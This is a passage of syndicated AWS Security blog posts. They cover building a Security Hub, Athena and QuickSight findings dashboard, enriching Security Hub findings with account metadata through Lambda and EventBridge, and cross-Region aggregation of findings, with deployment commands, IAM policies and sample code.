  2. Download the code from GitHub by cloning the repository, then cd into the cloned directory.

    $ git clone git@github.com:aws-samples/aws-security-hub-analytic-pipeline.git

    $ cd aws-security-hub-analytic-pipeline

  3. Manually create a virtualenv.

    $ python3 -m venv .venv

  4. After the initialization process completes and the virtualenv is created, you can use the following step to activate your virtualenv.

    $ source .venv/bin/activate

  5. If you’re using a Windows platform, use the following command to activate virtualenv:

    % .venv\Scripts\activate.bat

  6. Once the virtualenv is activated, you can install the required dependencies.

    $ pip install -r requirements.txt

Use AWS CDK to deploy the infrastructure into your account

The following steps use AWS CDK to deploy the infrastructure. This infrastructure includes the various scanners, Security Hub, EventBridge, and Kinesis Firehose streams. When complete, the raw Security Hub data will already be stored in an S3 bucket.

To deploy the infrastructure using AWS CDK

  1. If you’ve never used AWS CDK in the account you’re using or if you’ve never used CDK in the us-east-1, us-east-2, or us-west-1 Regions, you must bootstrap the regions via the command prompt.

    $ cdk bootstrap

  2. At this point, you can deploy the stack to your default AWS account via the command prompt.

    $ cdk deploy --all

  3. While cdk deploy is running, you will see the output in Figure 2. This is a prompt to ensure you’re aware that you’re making a security-relevant change and creating AWS Identity and Access Management (IAM) roles. Enter y when prompted to continue the deployment process:

    Figure 2. CDK approval prompt to create IAM roles

  4. Confirm cdk deploy is finished. When the deployment is finished, you should see three stack ARNs. It will look similar to Figure 3.

    Figure 3. Final output of CDK deploy

As a result of the deployed CDK code, Security Hub and the Prowler scanner will automatically scan your account, process the data, and send it to S3. While it takes less than an hour for some data to be processed and searchable in Athena, we recommend waiting 24 hours before proceeding to the next steps, to ensure enough data is processed to generate useful visualizations. This is because the remaining steps roll-up findings by the hour. Also, it takes several minutes to get initial results from the Security Hub standards and up to an hour to get initial results from Prowler.

Build an Athena view

Now that you’re deployed the infrastructure to detect, ingest, and transform security related findings, it’s time to use an Athena view to accomplish the analyze portion of the solution. The following view aggregates the number of findings for a given day. Athena views can be used to summarize data or enrich it with data from other sources. Use the following steps to build a simple example view. For more information on creating Athena views, see Working with Views.

To build an Athena view

  1. Open the AWS Management Console and ensure that the Region is set to us-east-1 (Northern Virginia).
  2. Navigate to the Athena service. If you’ve never used this service, choose Get Started to navigate to the Query Editor screen. Otherwise, the Query Editor screen is the default view.
  3. If you’re new to Athena, you also need to set up a query result location.
    1. Choose Settings in the top right of the Query Editor screen to open the settings panel.
    2. Choose Select to select a query result location.

      Figure 4. Athena settings

    3. Locate an S3 bucket in the list that starts with analyticsink-queryresults and choose the right-arrow icon.
    4. Choose Select to select a query results bucket.

      Figure 5. Select S3 location confirmation

  4. Select AwsDataCatalog as the Data source and security_hub_database as the Database. The Query Editor screen should look like Figure 6.

    Figure 6. Empty query editor

  5. Copy and paste the following SQL in the query window:

    CREATE OR REPLACE VIEW "security-hub-rolled-up-finding" AS
    SELECT
      "date_format"("from_iso8601_timestamp"(updatedat), '%Y-%m-%d %H:00') year_month_day_hour
    , region
    , compliance_status
    , workflowstate
    , severity_label
    , COUNT(DISTINCT title) AS cnt
    FROM
      security_hub_database."security-hub-crawled-findings"
    GROUP BY "date_format"("from_iso8601_timestamp"(updatedat), '%Y-%m-%d %H:00'), compliance_status, workflowstate, severity_label, region

  6. Choose the Run query button.

If everything is correct, you should see Query successful in the Results, as shown in Figure 7.

Figure 7. Creating an Athena view

Build QuickSight visualizations

Now that you’ve deployed the infrastructure to detect, ingest, and transform security related findings, and have created an Athena view to analyze those findings, it’s time to use QuickSight to visualize the findings. To use QuickSight, you must first grant QuickSight permissions to access S3 and Athena. Next you create a QuickSight data source. Third, you will create a QuickSight analysis. (Optional) When complete, you can publish the analysis.

You will build a simple visualization that shows counts of findings over time separated by severity, though it’s also possible to use QuickSight to tell rich and compelling visual stories.

In order to use QuickSight, you need to sign up for a QuickSight subscription. Steps to do so can be found in Signing Up for an Amazon QuickSight Subscription.

The first thing you need to do once logged in to QuickSight is create the data source. If this is your first time logging in to the service, you will be greeted with an initial QuickSight page as shown in Figure 8.

Figure 8. Initial QuickSight page

Grant QuickSight access to S3 and Athena

While creating the Athena data source will enable QuickSight to query data from Athena, you also need to enable QuickSight to read from S3.

To grant QuickSight access to S3 and Athena

  1. Inside QuickSight, select your profile name (upper right). Choose Manage QuickSight, and then choose Security & permissions.
  2. Choose Add or remove.
  3. Ensure the checkbox next to Athena is selected.
  4. Ensure the checkbox next to Amazon S3 is selected.
  5. Choose Details and then choose Select S3 Buckets.
  6. Locate an S3 bucket in the list that starts with analyticsink-bucket and ensure the checkbox is selected.
    Figure 9. Example permissions

  7. Choose Finish to save changes.

Create a QuickSight dataset

Once you’ve given QuickSight the necessary permissions, you can create a new dataset.

To create a QuickSight dataset

  1. Choose Datasets from the navigation pane at left. Then choose New Dataset.

    Figure 10. Dataset page

  2. To create a new Athena connection profile, use the following steps:
    1. In the FROM NEW DATA SOURCES section, choose the Athena data source card.
    2. For Data source name, enter a descriptive name. For example: security-hub-rolled-up-finding.
    3. For Athena workgroup choose [ primary ].
    4. Choose Validate connection to test the connection. This also confirms encryption at rest.
    5. Choose Create data source.
  3. On the Choose your table screen, select:
    Catalog: AwsDataCatalog
    Database: security_hub_database
    Table: security-hub-rolled-up-finding
  4. Finally, select the Import to SPICE for quicker analytics option and choose Visualize.

Once you’re finished, the page to create your first analysis will automatically open. Figure 11 shows an example of the page.

Figure 11. Create an analysis page

Create a QuickSight analysis

A QuickSight analysis is more than just a visualization—it helps you uncover hidden insights and trends in your data, identify key drivers, and forecast business metrics. You can create rich analytic experiences with QuickSight. For more information, visit Working with Visuals in the QuickSight User Guide.

For simplicity, you’ll build a visualization that summarizes findings categories by severity and aggregated by hour.

To create a QuickSight analysis

  1. Choose Line Chart from the Visual Types.

    Figure 12. Visual types

  2. Select Fields. Figure 13 shows what your field wells should look like at the end of this step.
    1. Locate the year_month_day_hour field in the field list and drag it over to the X axis field well.
    2. Locate the cnt field in the field list and drag it over to the Value field well.
    3. Locate the severity_label field in the field list and drag it over to Color field well.

      Figure 13. Field wells

  3. Add Filters.
    1. Select Filter in the left navigation panel.

      Figure 14. Filters panel

    2. Choose Create one… and select the compliance_status field.
    3. Expand the filter and clear NOT_AVAILABLE and PASSED (Note: depending on your data, you might not have all of these statuses).
    4. Choose Apply to apply the filter.

      Figure 15. Filtering out findings that are not failing

You should now see a visualization that looks like Figure 16, which shows a summary count of events and their severity.

Figure 16. Example visualization (note: this visualization has five days’ worth of data.)

Publish a QuickSight analysis dashboard (optional)

Publishing a dashboard is a great way to share reports with leaders. This two-step process allows you to share visualizations as a dashboard.

To publish a QuickSight analysis

  1. Choose Share on the application bar, then choose Publish dashboard.
  2. Select Publish new dashboard as, and then enter a dashboard name, such as Security Hub Findings by Severity.

You can also embed dashboards into web applications. This requires using the AWS SDK or the AWS Command Line Interface (AWS CLI). For more information, see Embedding QuickSight Data Dashboards for Everyone.

Encouraged security posture in QuickSight

QuickSight has a number of security features. For a summary of the standards that apply to this specific scenario, and for more detail, see AWS security in Amazon QuickSight in the Amazon QuickSight User Guide.

Clean up (optional)

When you're done, you can clean up by removing the QuickSight resources, the Athena view, and the CDK stack. Follow the detailed steps below to clean up everything.

To clean up QuickSight

  1. Open the console and choose Datasets in the left navigation pane.
  2. Select security-hub-rolled-up-finding then choose Delete dataset.
  3. Confirm dataset deletion by choosing Delete.
  4. Choose Analyses from the left navigation pane.
  5. Choose the menu in the lower right corner of the security-hub-rolled-up-finding card.

    Figure 17. Example analysis card

  6. Select Delete and confirm Delete.

To remove the Athena view

  1. Paste the following SQL in the query window:

    DROP VIEW "security-hub-rolled-up-finding"

  2. Choose the Run query button.

To remove the CDK stack

  1. Run the following command in your terminal:

    cdk destroy

    Note: If you experience errors, you might need to reactivate your Python virtual environment by completing steps 3–5 of Use AWS CDK to deploy the infrastructure.

Conclusion

In this blog post, you used Security Hub and QuickSight to deploy a scalable analytic pipeline for your security tools. Security Hub allowed you to join and collect security findings from multiple sources, and with QuickSight you summarized that data to give your senior leaders and decision-makers the right information in real time.

You ensured that your sensitive data remained protected by explicitly granting QuickSight the ability to read from a specific S3 bucket. By authorizing access only to the data sources needed to visualize your data, you ensured least-privilege access. QuickSight supports many other AWS data sources, including Amazon RDS, Amazon Redshift, Lake Formation, and Amazon OpenSearch Service (successor to Amazon Elasticsearch Service). Because the data doesn't live inside an Amazon Virtual Private Cloud (Amazon VPC), you didn't need to grant access to any specific VPCs. Limiting access to VPCs is another great way to improve the security of your environment.

 
If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, start a new thread on the Security Hub forum. To start your 30-day free trial of Security Hub, visit AWS Security Hub.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

David Hessler

David is a senior cloud consultant with AWS Professional Services. He has over a decade of technical experience helping customers tackle their most challenging technical problems and providing tailor-made solutions using AWS services. He is passionate about DevOps, security automation, and how the two work together to allow customers to focus on what matters: their mission.

How to enrich AWS Security Hub findings with account metadata

Post Syndicated from Siva Rajamani original https://aws.amazon.com/blogs/security/how-to-enrich-aws-security-hub-findings-with-account-metadata/

In this blog post, we’ll walk you through how to deploy a solution to enrich AWS Security Hub findings with additional account-related metadata, such as the account name, the organizational unit (OU) associated with the account, security contact information, and account tags. Account metadata can help you search findings, create insights, and better respond to and remediate findings.

AWS Security Hub ingests findings from multiple AWS services, including Amazon GuardDuty, Amazon Inspector, Amazon Macie, AWS Firewall Manager, AWS Identity and Access Management (IAM) Access Analyzer, and AWS Systems Manager Patch Manager. Findings from each service are normalized into the AWS Security Finding Format (ASFF), so you can review findings in a standardized format and take action quickly. You can use AWS Security Hub to provide a single view of all security-related findings, and to set up alerts, automate remediation, and export specific findings to third‑party incident management systems.

The Security or DevOps teams responsible for investigating, responding to, and remediating Security Hub findings may need additional account metadata beyond the account ID to determine what to do about the finding or where to route it. For example, determining whether the finding originated from a development or production account can be key to determining its priority and the type of remediation action needed. Having this metadata in the finding allows customers to create custom insights in Security Hub to track which OUs or applications (based on account tags) have the most open security issues. This blog post demonstrates a solution to enrich your findings with account metadata to help your Security and DevOps teams better understand and improve their security posture.

Solution Overview

In this solution, you will use a combination of AWS Security Hub, Amazon EventBridge, and AWS Lambda to ingest findings and automatically enrich them with account-related metadata by querying the AWS Organizations and Account Management APIs. The solution architecture is shown in Figure 1 below:

Figure 1: Solution Architecture and workflow for metadata enrichment

The solution workflow includes the following steps:

  1. New findings and updates to existing Security Hub findings from all the member accounts flow into the Security Hub administrator account. Security Hub generates Amazon EventBridge events for the findings.
  2. An EventBridge rule created as part of the solution in the Security Hub administrator account will trigger a Lambda function configured as a target every time an EventBridge notification for a new or updated finding imported into Security Hub matches the EventBridge rule shown below:
    {
      "detail-type": ["Security Hub Findings - Imported"],
      "source": ["aws.securityhub"],
      "detail": {
        "findings": {
          "RecordState": ["ACTIVE"],
          "UserDefinedFields": {
            "findingEnriched": [{
              "exists": false
            }]
          }
        }
      }
    }

  3. The Lambda function uses the account ID from the event payload to retrieve both the account information and the alternate contact information from the AWS Organizations and Account Management APIs. The following code within helper.py constructs the account_details object representing the account information used to enrich the finding:
    def get_account_details(account_id, role_name):
        account_details = {}
        organizations_client = AwsHelper().get_client('organizations')
        # Look up the account name in AWS Organizations
        response = organizations_client.describe_account(AccountId=account_id)
        account_details["Name"] = response["Account"]["Name"]
        # Determine the parent organizational unit (OU) of the account
        response = organizations_client.list_parents(ChildId=account_id)
        ou_id = response["Parents"][0]["Id"]
        if ou_id and response["Parents"][0]["Type"] == "ORGANIZATIONAL_UNIT":
            response = organizations_client.describe_organizational_unit(OrganizationalUnitId=ou_id)
            account_details["OUName"] = response["OrganizationalUnit"]["Name"]
        elif ou_id:
            account_details["OUName"] = "ROOT"
        # Assume the cross-account role, if provided, to call the
        # Account Management API in the Organizations management account
        if role_name:
            account_client = AwsHelper().get_session_for_role(role_name).client("account")
        else:
            account_client = AwsHelper().get_client('account')
        try:
            # Retrieve the account's security alternate contact
            response = account_client.get_alternate_contact(
                AccountId=account_id,
                AlternateContactType='SECURITY'
            )
            if response['AlternateContact']:
                print("contact :{}".format(str(response["AlternateContact"])))
                account_details["AlternateContact"] = response["AlternateContact"]
        except account_client.exceptions.AccessDeniedException as error:
            # Potentially due to calling alternate contact on the Org Management account
            print(error.response['Error']['Message'])

        # Collect all account tags, paginating through the results
        response = organizations_client.list_tags_for_resource(ResourceId=account_id)
        results = response["Tags"]
        while "NextToken" in response:
            response = organizations_client.list_tags_for_resource(ResourceId=account_id, NextToken=response["NextToken"])
            results.extend(response["Tags"])

        account_details["tags"] = results
        AccountHelper.logger.info("account_details: %s", str(account_details))
        return account_details

  4. The Lambda function updates the finding using the Security Hub BatchUpdateFindings API to add the account-related data to the Note and UserDefinedFields attributes of the Security Hub finding:
    #lookup and build the finding note and user defined fields  based on account Id
    enrichment_text, tags_dict = enrich_finding(account_id, assume_role_name)
    logger.debug("Text to post: %s" , enrichment_text)
    logger.debug("User defined Fields %s" , json.dumps(tags_dict))
    #add the Note to the finding and add a userDefinedField to use in the event bridge rule and prevent repeat lookups
    response = secHubClient.batch_update_findings(
        FindingIdentifiers=[
            {
                'Id': enrichment_finding_id,
                'ProductArn': enrichment_finding_arn
            }
        ],
        Note={
            'Text': enrichment_text,
            'UpdatedBy': enrichment_author
        },
        UserDefinedFields=tags_dict
    )

    Note: All state change events published by AWS services through Amazon EventBridge are free of cost. The AWS Lambda free tier includes 1M free requests per month, and 400,000 GB-seconds of compute time per month at the time of publication of this post. If you process 2M requests per month, the estimated cost for this solution would be approximately $7.20 USD per month.

    Prerequisites

    1. Your AWS organization must have all features enabled.
    2. This solution requires that you have AWS Security Hub enabled in an AWS multi-account environment which is integrated with AWS Organizations. The AWS Organizations management account must designate a Security Hub administrator account, which can view data from and manage configuration for its member accounts. Follow these steps to designate a Security Hub administrator account for your AWS organization.
    3. All member accounts are tagged according to your organization’s tagging strategy, and their security alternate contact information is filled in. If the tags or alternate contacts are not available, the enrichment will be limited to the account name and the organizational unit name.
    4. Trusted access must be enabled with AWS Organizations for AWS Account Management service. This will enable the AWS Organizations management account to call the AWS Account Management API operations (such as GetAlternateContact) for other member accounts in the organization. Trusted access can be enabled either by using AWS Management Console or by using AWS CLI and SDKs.

      The following AWS CLI example enables trusted access for AWS Account Management in the calling account’s organization.

      aws organizations enable-aws-service-access --service-principal account.amazonaws.com

    5. An IAM role with read-only access to look up the GetAlternateContact details must be created in the Organizations management account, with a trust policy that allows the Security Hub administrator account to assume the role.

    Solution Deployment

    This solution consists of two parts:

    1. Create an IAM role in your Organizations management account, giving it necessary permissions as described in the Create the IAM role procedure below.
    2. Deploy the Lambda function and the other associated resources to your Security Hub administrator account

    Create the IAM role

    Using console, AWS CLI or AWS API

    Follow the Creating a role to delegate permissions to an IAM user instructions to create an IAM role named account-contact-readonly in the AWS Organizations management account, using the console, AWS CLI, or AWS API, based on the trust and permission policy templates provided below. You will need the account ID of your Security Hub administrator account.

    The IAM trust policy allows the Security Hub administrator account to assume the role in your Organization management account.

    IAM Role trust policy

    {
      "Version": "2012-10-17",
      "Statement": [
        {
          "Effect": "Allow",
          "Principal": {
            "AWS": "arn:aws:iam::<SH administrator Account ID>:root"
          },
          "Action": "sts:AssumeRole",
          "Condition": {}
        }
      ]
    }

    Note: Replace <SH administrator Account ID> with the account ID of your Security Hub administrator account. Once the solution is deployed, you should update the principal in the trust policy shown above to use the new IAM role created for the solution.

    IAM Permission Policy

    {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Effect": "Allow",
                "Action": [
                    "account:GetAlternateContact"
                ],
                "Resource": "arn:aws:account::<Org. Management Account id>:account/o-*/*"
            }
        ]
    }

    The IAM permission policy allows the Security Hub administrator account to look up the alternate contact information for the member accounts.

    Make a note of the Role ARN for the IAM role similar to this format:

    arn:aws:iam::<Org. Management Account id>:role/account-contact-readonly

    You will need this while deploying the solution in the next procedure.

    Using AWS CloudFormation

    Alternatively, you can use the provided CloudFormation template to create the role in the management account. The IAM role ARN is available in the Outputs section of the created CloudFormation stack.

    Deploy the Solution to your Security Hub administrator account

    You can deploy the solution using either the AWS Management Console, or from the GitHub repository using the AWS SAM CLI.

    Note: If you have designated an aggregation Region within the Security Hub administrator account, you can deploy this solution only in the aggregation Region; otherwise, you need to deploy this solution separately in each Region of the Security Hub administrator account where Security Hub is enabled.

    To deploy the solution using the AWS Management Console

    1. In your Security Hub administrator account, launch the template by choosing the Launch Stack button below, which creates the stack in the us-east-1 Region.

      Note: If your Security Hub aggregation Region is different from us-east-1, or you want to deploy the solution in a different AWS Region, you can deploy the solution from the GitHub repository as described in the next section.


    2. On the Quick create stack page, for Stack name, enter a unique stack name for this account; for example, aws-security-hub-findings-enrichment-stack, as shown in Figure 2 below.
      Figure 2: Quick Create CloudFormation stack for the Solution

    3. For ManagementAccount, enter the AWS Organizations management account ID.
    4. For OrgManagementAccountContactRole, enter the role ARN of the role you created previously in the Create IAM role procedure.
    5. Choose Create stack.
    6. Once the stack is created, go to the Resources tab and take note of the name of the IAM Role which was created.
    7. Update the principal element of the IAM role trust policy which you previously created in the Organization management account in the Create the IAM role procedure above, replacing it with the role name you noted down, as shown below.
      Figure 3: Update Management Account Role’s Trust

    To deploy the solution from the GitHub Repository and AWS SAM CLI

    1. Install the AWS SAM CLI
    2. Download or clone the GitHub repository using the following commands:
      $ git clone https://github.com/aws-samples/aws-security-hub-findings-account-data-enrichment.git
      $ cd aws-security-hub-findings-account-data-enrichment

    3. Update the content of the profile.txt file with the profile name you want to use for the deployment
    4. To create a new bucket for deployment artifacts, run create-bucket.sh, specifying the Region as an argument, as shown below.
      $ ./create-bucket.sh us-east-1

    5. Deploy the solution to the account by running the deploy.sh script, specifying the Region as an argument:
      $ ./deploy.sh us-east-1

    6. Once the stack is created, go to the Resources tab and take note of the name of the IAM Role which was created.
    7. Update the principal element of the IAM role trust policy which you previously created in the Organization management account in the Create the IAM role procedure above, replacing it with the role name you noted down, as shown below.
      "AWS": "arn:aws:iam::<SH Delegated Account ID>: role/<Role Name>"

    Using the enriched attributes

    To test that the solution is working as expected, you can create a standalone security group with an ingress rule that allows traffic from the internet. This will trigger a finding in Security Hub, which will be populated with the enriched attributes. You can then use these enriched attributes to filter and create custom insights, or take specific response or remediation actions.

    To generate a sample Security Hub finding using AWS CLI

    1. Create a Security Group using following AWS CLI command:
      aws ec2 create-security-group --group-name TestSecHubEnrichmentSG --description "Test Security Hub enrichment function"

    2. Make a note of the security group ID from the output, and use it in Step 3 below.
    3. Add an ingress rule to the security group which allows unrestricted traffic on port 100:
      aws ec2 authorize-security-group-ingress --group-id <security group ID> --protocol tcp --port 100 --cidr 0.0.0.0/0

    Within a few minutes, a new finding will be generated in Security Hub, warning about the unrestricted ingress rule in the TestSecHubEnrichmentSG security group. For any new or updated finding that does not have the UserDefinedFields attribute findingEnriched set to true, the solution will enrich the finding with account-related fields in both the Note and UserDefinedFields sections of the Security Hub finding.

    To see and filter the enriched finding

    1. Go to Security Hub and choose Findings in the left-hand navigation pane.
    2. Click in the filter field at the top to add additional filters. Choose a filter field of AWS Account ID, a filter match type of is, and a value of the AWS Account ID where you created the TestSecHubEnrichmentSG security group.
    3. Add one more filter. Choose a filter field of Resource type, a filter match type of is, and the value of AwsEc2SecurityGroup.
    4. Identify the finding for security group TestSecHubEnrichmentSG with updates to Note and UserDefinedFields, as shown in Figures 4 and 5 below:
      Figure 4: Account metadata enrichment in Security Hub finding’s Note field

      Figure 5: Account metadata enrichment in Security Hub finding’s UserDefinedFields field

      Note: The actual attributes you will see as part of the UserDefinedFields may be different from the above screenshot. Attributes shown will depend on your tagging configuration and the alternate contact configuration. At a minimum, you will see the AccountName and OU fields.

    5. Once you confirm that the solution is working as expected, delete the stand-alone security group TestSecHubEnrichmentSG, which was created for testing purposes.

    Create custom insights using the enriched attributes

    You can use the attributes available in the UserDefinedFields section of the Security Hub finding to filter findings. This lets you generate custom Security Hub insights and reports tailored to your organization’s needs. The example shown in Figure 6 below creates a custom Security Hub insight for findings grouped by severity for a specific owner, using the Owner attribute within the UserDefinedFields object of the Security Hub finding.

    Figure 6: Custom Insight with Account metadata filters
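
    If you prefer to create this kind of insight programmatically, a boto3 sketch might look like the following; the insight name and the Owner value are examples.

    import boto3

    securityhub = boto3.client('securityhub')

    # Group active findings for a specific owner (written into
    # UserDefinedFields by the enrichment function) by severity
    securityhub.create_insight(
        Name='Active findings for team-payments, by severity',  # example name
        Filters={
            'RecordState': [{'Value': 'ACTIVE', 'Comparison': 'EQUALS'}],
            'UserDefinedFields': [
                {'Key': 'Owner', 'Value': 'team-payments', 'Comparison': 'EQUALS'}
            ],
        },
        GroupByAttribute='SeverityLabel',
    )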

    EventBridge rule for response or remediation action using enriched attributes

    You can also use the attributes in the UserDefinedFields object of the Security Hub finding within an EventBridge rule to take specific response or remediation actions based on the values of those attributes. In the example below, you can see how the Environment attribute can be used within the EventBridge rule configuration to trigger specific actions only when the value matches PROD.

    {
      "detail-type": ["Security Hub Findings - Imported"],
      "source": ["aws.securityhub"],
      "detail": {
        "findings": {
          "RecordState": ["ACTIVE"],
          "UserDefinedFields": {
            "Environment": "PROD"
          }
        }
      }
    }

    Conclusion

    This blog post walked you through a solution to enrich AWS Security Hub findings with account-related metadata using Amazon EventBridge notifications and AWS Lambda. By enriching Security Hub findings with account-related information, your security teams gain better visibility, additional insights, and an improved ability to create targeted reports for specific accounts or business teams, helping them prioritize and improve the overall security response.

 
If you have feedback about this post, submit comments in the Comments section below. If you have any questions about this post, start a thread on the AWS Security Hub forum.

Want more AWS Security news? Follow us on Twitter.

Siva Rajamani

Siva Rajamani is a Boston-based Enterprise Solutions Architect at AWS. Siva enjoys working closely with customers to accelerate their AWS cloud adoption and improve their overall security posture.

Prashob Krishnan

Prashob Krishnan is a Denver-based Technical Account Manager at AWS. Prashob is passionate about security. He enjoys working with customers to solve their technical challenges and help build a secure scalable architecture on the AWS Cloud.

Best practices for cross-Region aggregation of security findings

Post Syndicated from Marshall Jones original https://aws.amazon.com/blogs/security/best-practices-for-cross-region-aggregation-of-security-findings/

AWS Security Hub enables customers to have a centralized view into the security posture across their AWS environment by aggregating security alerts from various AWS services and partner products in a standardized format, so that you can more easily take action on them. To facilitate that central view, Security Hub allows you to designate an aggregation Region, which links some or all Regions to a single aggregation Region in a delegated administrator AWS account. All findings across all of your accounts and all of your linked Regions are processed by Security Hub in this one Region. With this feature, you can take advantage of many configurations when ingesting findings into Security Hub that will benefit you operationally and provide cost savings.

This blog post provides you with a set of best practices when using Security Hub across multiple Regions. After implementing the recommendations in this blog post, you’ll have an optimized and centralized view of Security Hub findings from all integrated AWS services and partner products across all Regions in a single AWS account and Region.

Enable cross-Region aggregation

To enable cross-Region aggregation in Security Hub, you must first enable finding aggregation in Security Hub from the Region that will become the aggregation Region. You cannot use a Region that is disabled by default as your aggregation Region. For a list of Regions that are disabled by default, see Enabling a Region in the AWS General Reference.

You can enable AWS Security Hub finding aggregation using either the console or CLI. You must enable finding aggregation from the Region that will be the aggregation Region.

To enable Security Hub finding aggregation from the console

To enable AWS Security Hub finding aggregation using the AWS console:

  1. Start by navigating to the AWS Security Hub console and select Settings on the left side of the screen. Once on the settings page, choose the Regions tab.
Figure 1. Enabling finding aggregation

  2. Check the checkbox to Link future Regions. As AWS releases new Regions, their results will automatically be aggregated into your designated Region. If this checkbox is not checked, any new Region that is released will not aggregate Security Hub findings to the aggregation Region.

To enable Security Hub finding aggregation using the CLI

Alternatively, you can enable AWS Security Hub finding aggregation by using the following CLI command:

aws securityhub create-finding-aggregator --region <aggregation Region> --region-linking-mode ALL_REGIONS | ALL_REGIONS_EXCEPT_SPECIFIED | SPECIFIED_REGIONS --regions <Region list>

Here’s a sample CLI command to enable AWS Security Hub finding aggregation:

aws securityhub create-finding-aggregator --region us-east-1 --region-linking-mode SPECIFIED_REGIONS --regions us-west-1,us-west-2
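If you script your Security Hub setup, the equivalent call is available in the AWS SDKs. Here's a minimal sketch using Boto3; the Region values are examples, not requirements:

import boto3

# Run this in the Region you want to designate as the aggregation Region.
securityhub = boto3.client("securityhub", region_name="us-east-1")

response = securityhub.create_finding_aggregator(
    RegionLinkingMode="SPECIFIED_REGIONS",  # or ALL_REGIONS / ALL_REGIONS_EXCEPT_SPECIFIED
    Regions=["us-west-1", "us-west-2"],     # the Regions to link
)
print(response["FindingAggregatorArn"])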

For more details about AWS Security Hub cross-Region aggregation, see Aggregating findings across Regions.

Consolidating downstream SIEM and ticketing integrations

Security Hub findings for all AWS accounts in your environment should be integrated into a Security Information and Event Management (SIEM) solution, such as Amazon OpenSearch Service or an APN partner SIEM, or a standardized ticketing system such as JIRA or ServiceNow.

You should send all Security Hub findings to a SIEM or ticketing solution from a single aggregation point to simplify operational overhead. Although integration architectures vary, as an example, this might mean configuring an Amazon EventBridge rule to parse and send findings to AWS Lambda or Amazon Kinesis for a custom integration point with the SIEM or ticketing solution.

You should configure this integration point in a single delegated administrator account across all member AWS accounts and aggregated Regions. Avoid building a separate integration point between each Security Hub Region and your SIEM or ticketing solution; multiple integration points add unnecessary operational overhead and cost for the resources required to stream findings to your SIEM.

Collecting Security Hub findings in a SIEM or ticketing solution can help you correlate findings across many other log sources. For example, you might use a SIEM solution to analyze operating system logs from an Amazon Elastic Compute Cloud (Amazon EC2) instance and correlate them with GuardDuty findings collected by Security Hub to investigate suspicious activity. You could also create an automated, bidirectional integration between Security Hub and ServiceNow or JIRA that keeps your Security Hub findings and tickets in sync.
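As an illustration of one such integration point, the following Boto3 sketch creates an EventBridge rule in the aggregation Region that forwards every finding imported into Security Hub to a Lambda function. The rule name and function ARN are placeholders for your own resources, and you would still need to grant EventBridge permission to invoke the function:

import boto3
import json

events = boto3.client("events", region_name="us-east-1")  # aggregation Region

# Match all findings imported into Security Hub; narrow this pattern as needed.
pattern = {
    "source": ["aws.securityhub"],
    "detail-type": ["Security Hub Findings - Imported"],
}

events.put_rule(
    Name="forward-securityhub-findings",
    EventPattern=json.dumps(pattern),
    State="ENABLED",
)

# Placeholder ARN: your custom integration function for the SIEM or ticketing system.
events.put_targets(
    Rule="forward-securityhub-findings",
    Targets=[{
        "Id": "siem-integration",
        "Arn": "arn:aws:lambda:us-east-1:123456789012:function:SendToSiem",
    }],
)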

Auto-archive GuardDuty findings associated with global resources

Amazon GuardDuty creates findings associated with AWS IAM resources. IAM resources are global resources, which means that they are not Region-specific. If GuardDuty generates a finding for an IAM API call that is not Region-specific, such as ListGroups (for example, the finding type PenTest:IAMUser/KaliLinux), that finding is created in every GuardDuty Region and ingested into Security Hub in every Region. Implement suppression rules in GuardDuty so that you don't have multiple copies of the same finding in the finding aggregation Region of your Security Hub delegated administrator account.

To implement Amazon GuardDuty suppression rules (Console)

To reduce the duplication of findings in Security Hub, suppress global GuardDuty findings in all Regions except the Security Hub aggregation Region. For example, if you are aggregating Security Hub findings in us-east-1 and your environment uses all commercial AWS Regions in the United States, you would add a suppression rule in GuardDuty in us-east-2, us-west-1, and us-west-2.

To create Amazon GuardDuty suppression rules using the AWS console:

  1. Navigate to the GuardDuty console and select the Findings link on the left side of the screen.
Figure 2. Creating GuardDuty suppression rules

  2. Filter to search for the findings you want to suppress, and click Save / edit in the search bar.
  3. Enter a name and description for the suppression rule, and save it.

To implement Amazon GuardDuty suppression rules (CLI)

Alternatively, you can create Amazon GuardDuty suppression rules by using the CreateFilter API via the CLI.

  1. Create a JSON file (criteria.json in the commands below) with your desired filter criteria for the suppression rule.
  2. Test your filter criteria by listing the GuardDuty findings that would be suppressed:
     aws guardduty list-findings --detector-id 12abc34d567e8fa901bc2d34e56789f0 --finding-criteria file://criteria.json
  3. Create a filter that archives the matching GuardDuty findings:
     aws guardduty create-filter --action ARCHIVE --detector-id 12abc34d567e8fa901bc2d34e56789f0 --name yourfiltername --finding-criteria file://criteria.json
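If you prefer to script the suppression rule, here is a minimal Boto3 sketch of the same CreateFilter call; the detector ID, rule name, and finding type are examples that you would replace with your own values:

import boto3

# Create the suppression rule in each Region except the aggregation Region.
guardduty = boto3.client("guardduty", region_name="us-west-2")

# Example criteria: archive a global IAM finding type that would otherwise
# be duplicated in every Region.
criteria = {
    "Criterion": {
        "type": {"Equals": ["PenTest:IAMUser/KaliLinux"]}
    }
}

guardduty.create_filter(
    DetectorId="12abc34d567e8fa901bc2d34e56789f0",  # detector in this Region
    Name="suppress-global-iam-findings",
    Action="ARCHIVE",  # archive matching findings as they arrive
    FindingCriteria=criteria,
)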

For more details about creating Amazon GuardDuty suppression rules, see Creating AWS GuardDuty suppression rules.

Reduce AWS Config cost by recording global resources in one Region

Like GuardDuty, AWS Config also records supported types of global resources, which are not tied to a specific Region and can be used in all Regions. The global resource types that AWS Config supports are IAM users, groups, roles, and customer managed policies. The configuration details for a specific global resource are the same in all Regions. If you have the AWS Foundational Security Best Practices standard enabled in Security Hub, it includes certain checks against global resources recorded by AWS Config; you need to disable these checks in all Regions except the aggregation Region.

Customize AWS Config for global resources

If you customize AWS Config in multiple Regions to record global resources, AWS Config creates multiple configuration items each time a global resource changes, one configuration item for each Region. Costs for each configuration item can be found on AWS Config pricing. These configuration items will contain identical data. To prevent duplicate configuration items, consider customizing AWS Config in only one Region to record global resources, unless you want those configuration items to be available in multiple Regions. See this blog post for a comprehensive list of additional AWS Config best practices.

To customize AWS Config for global resources (Console)

Follow the steps below to change the AWS Config global resource configuration in the AWS Console.

  1. Navigate to the AWS Config console and select Settings on the left side of the screen.
  2. Click Edit in the top right corner.
  3. Uncheck the Include global resources checkbox.
  4. Repeat these steps for each Region where AWS Config is enabled, except the Region where you would like to track global resources.
Figure 3. AWS Config global resource setting

To customize AWS Config for global resources (CLI)

Alternatively, you can disable the global resource tracking in AWS Config using the CLI.

